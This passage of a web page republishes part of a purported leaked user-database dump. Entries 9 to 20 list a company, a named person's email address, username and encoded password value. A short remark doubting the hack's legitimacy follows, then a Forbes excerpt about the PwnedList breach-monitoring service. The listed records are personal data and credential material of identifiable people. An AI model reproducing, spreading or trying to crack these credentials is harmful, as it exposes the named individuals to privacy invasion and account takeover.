<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">9)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY SUMMIET ENTERTAINMENT &#8211; http://summit-ent.com/ -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first &nbsp;&nbsp;&nbsp; name_last &nbsp;&nbsp;&nbsp; &nbsp;email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Jack &nbsp;&nbsp;&nbsp; &nbsp;Pan &nbsp;&nbsp;&nbsp; &nbsp;jpan@summit-ent.com jack &nbsp;&nbsp;&nbsp; &nbsp;87ZlOY13dwsMvc/YrGrSlg==M &nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">10)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY APPLE &#8211; http://mac.com -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first &nbsp;&nbsp;&nbsp; name_last &nbsp;&nbsp;&nbsp; &nbsp;email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">James &nbsp;&nbsp;&nbsp; &nbsp;Foreman &nbsp;&nbsp;&nbsp; &nbsp;jimf@mac.com &nbsp;&nbsp;&nbsp; &nbsp;jimf &nbsp;&nbsp;&nbsp; &nbsp;f+KkZW2PuZVvXkfXhdItH5prhV743ABuM</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">11)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY ARTIFICIAL INTELLIGENCE &#8211; http://ia.com -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first &nbsp;&nbsp;&nbsp; name_last &nbsp;&nbsp;&nbsp; &nbsp;email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Decision &nbsp;&nbsp;&nbsp; Maker &nbsp;&nbsp;&nbsp; &nbsp;info@ai.com &nbsp;&nbsp;&nbsp; &nbsp;aiclient 8scR+pcaq2IvYHmQblzgIfEU/c3Cu2AJM</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">12)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY BRANDON YANO &#8211; http://brandonyano.com -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first &nbsp;&nbsp;&nbsp; name_last &nbsp;&nbsp;&nbsp; &nbsp;email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brandon &nbsp;&nbsp;&nbsp; Yano &nbsp;&nbsp;&nbsp; &nbsp;Brandon@brandonyano.com byano ujU0QcoaoOgF5RezEMyBrg==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">13)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY BUNIM MURRAT PRODUCTION- http://bunim-murray.com -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first name_last &nbsp;&nbsp;&nbsp; &nbsp;email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cara &nbsp;&nbsp;&nbsp; &nbsp;Goldberg &nbsp;&nbsp;&nbsp; &nbsp;cgoldberg@bunim-murray.com cara &nbsp;&nbsp;&nbsp; &nbsp;XDCcFQ4+/1Hsda7Cl/lJm8XNJFxAhwuKM</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">14)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY SYCAMORE SOLUTIONS LTD &#8211; http://sycamoresol.com/ -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first &nbsp;&nbsp;&nbsp; name_last &nbsp;&nbsp;&nbsp; email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Deepak &nbsp;&nbsp;&nbsp; &nbsp;Sodhi &nbsp;&nbsp;&nbsp; &nbsp;dsodhi@sycamoresol.com deepak yYvQBSj3FlJB49MP/gLisA==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">15)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY PLENETA GROUP &#8211; http://planetarygroup.com -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first name_last &nbsp;&nbsp;&nbsp; &nbsp;email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Chris &nbsp;&nbsp;&nbsp; &nbsp;Donohue &nbsp;&nbsp;&nbsp; &nbsp;cmd@planetarygroup.com cmd &nbsp;&nbsp;&nbsp; &nbsp;gz2UpeBjXzIBjZFBsJEhgoRw3moVFypYM &nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">16)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY MADEB &amp; UNION &#8211; http://madebyunion.com -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first &nbsp;&nbsp;&nbsp; name_last &nbsp;&nbsp;&nbsp; &nbsp;email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Jay &nbsp;&nbsp;&nbsp; &nbsp;Stakelon &nbsp;&nbsp;&nbsp; &nbsp;jay@madebyunion.com &nbsp;&nbsp;&nbsp; union &nbsp;&nbsp;&nbsp; &nbsp;h3aTQCBsAIN2wfLo39Vyuw==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">17)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY CBS TV &#8211; http://cbs.com -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first name_last &nbsp;&nbsp;&nbsp; email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Matt &nbsp;&nbsp;&nbsp; &nbsp;Gilhooley matt.gilhooley@cbs.com mattg &nbsp;&nbsp;&nbsp; &nbsp;gq2ya4oDLus50AqGRWdnna9nNUpCdJcTM &nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">18)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY SCARLET TERRIER &#8211; http://scarletterrier.com-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first name_last &nbsp;&nbsp;&nbsp; &nbsp;email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Jonathan Tavss &nbsp;&nbsp;&nbsp; &nbsp;jonathan@scarletterrier.com jtavss &nbsp;&nbsp;&nbsp; &nbsp;PWVL4Sg1ctVVP2yQ3Ju+6Q==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">19)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY EMEXING &#8211; http://emixing.com -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first &nbsp;&nbsp;&nbsp; name_last email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Richard Furch &nbsp;&nbsp;&nbsp; &nbsp;info@emixing.com &nbsp;&nbsp;&nbsp; &nbsp;rfurch asHcug12qXfhVQEH0Eb0Aw==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">20)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY SUBWAY &#8211; http://subwat.com -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first &nbsp;&nbsp;&nbsp; name_last &nbsp;&nbsp;&nbsp; &nbsp;email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tom Subway &nbsp;&nbsp;&nbsp; &nbsp;tom@subway.com tom &nbsp;&nbsp;&nbsp; &nbsp;1DZJovZVbgbpt12u+10Hkg==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Right now, the hack looks very questionable. We&rsquo;ll know soon enough if the hack is legitimate or not.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.forbes.com/sites/andygreenberg/2012/03/19/with-12-million-hacked-accounts-data-pwned-list-launches-as-a-breach-monitoring-service/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.forbes.com/sites/andygreenberg/2012/03/19/with-12-million-hacked-accounts-data-pwned-list-launches-as-a-breach-monitoring-service/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Having your usernames and passwords stolen and sprayed across the Web is never fun, as millions have discovered after hackers breach a company where they work or where they&rsquo;ve registered an account. But worse yet is to have that personal information hung out for all to see and not even know it.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nine months ago,</span><a href="https://pwnedlist.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Pwned List</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> was created to answer a simple question for users: Is your account among the millions whose credentials have been spilled onto the web? Visit PwnedList.com, (whose name comes from the verb &ldquo;to pwn,&rdquo; slang for hacking someone or something) type in your email address or username, and the site will check it against a database that has now grown to 12 million compromised credentials it&rsquo;s collected from crawling public sites where hackers post stolen data. For each of those 12 million usernames or email addresses, Pwned List has confirmed that a password was also published online.</span></p>
